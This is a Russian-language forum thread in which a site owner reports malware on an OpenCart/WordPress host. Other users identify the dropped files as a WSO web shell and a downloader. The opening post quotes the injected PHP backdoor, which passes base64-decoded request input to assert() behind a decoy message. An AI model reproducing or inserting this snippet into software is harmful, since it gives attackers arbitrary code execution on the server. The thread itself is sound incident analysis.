Зловред

Trafim6021 · 31 Май 2016

Свеженький зловред. Буду рад если кто-то разберет что он делает.
В корне сайта появляется два файла.
gopni3g.zip и 756fe38ca6.php а так же в рандомных папках rss_feeder.class.php

Дальнейшие действия не известны. Мониторинг файлов прислал смску что появились новые файлы и они были экспроприированы с сервера.
Сейчас сижу изучаю логи, как оно туда попало.

А ещё в некоторые php файлы добавился код

Код:

if ( $_REQUEST["array"] )
{   

    @assert(base64_decode($_REQUEST["array"]));   
    //debug message
    echo "Array sort completed";
    exit();
}

ZiX · 31 Май 2016

Trafim6021 написал(а):
Свеженький зловред. Буду рад если кто-то разберет что он делает.
В корне сайта появляется два файла.
gopni3g.zip и 756fe38ca6.php а так же в рандомных папках rss_feeder.class.php

Дальнейшие действия не известны. Мониторинг файлов прислал смску что появились новые файлы и они были экспроприированы с сервера.
Сейчас сижу изучаю логи, как оно туда попало.

А ещё в некоторые php файлы добавился код

Код:

if ( $_REQUEST["array"] ) { @assert(base64_decode($_REQUEST["array"])); //debug message echo "Array sort completed"; exit(); }

Какой движок?

Trafim6021 · 31 Май 2016

ZiX написал(а):
Какой движок?

Опенкарт и Вордпресс на этом аккаунте который заразился.

В логах вижу периодическое обращение к этим файлам с разных айпишников.

Jim_Di · 1 Июн 2016

rss_feeder.class.php - это WSO Shell 2.5
дополнительно можешь заблокировать доступ до Для просмотра ссылки Войди или Зарегистрируйся и подать абузу - оттуда качает тебе хрень.

latteo · 2 Июн 2016

php-код c assert - микрошелл, позволяет выполнить произвольный код на вашем хостинг акке

756fe38ca6.php - скачивает и распаковывает gopni3g.zip с домена Для просмотра ссылки Войди или Зарегистрируйся

gopni3g.zip - увы пустой, потому как Для просмотра ссылки Войди или Зарегистрируйся в дауне, так что не известно что из него проинсталили.
Если найдёте у себя с размером отличным от 0 выкладывайте.

Nei · 2 Июн 2016

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

latteo · 2 Июн 2016

gopni3g.zip - что-то типа дора, со сливом через tds на домене Для просмотра ссылки Войди или Зарегистрируйся

Зловред

Trafim6021

Постоялец

Вложения

ZiX

Коддинг, Парсинг

Trafim6021

Постоялец

Jim_Di

Писатель

latteo

Эффективное использование PHP, MySQL

Nei

Nosce te ipsum

Вложения

latteo

Эффективное использование PHP, MySQL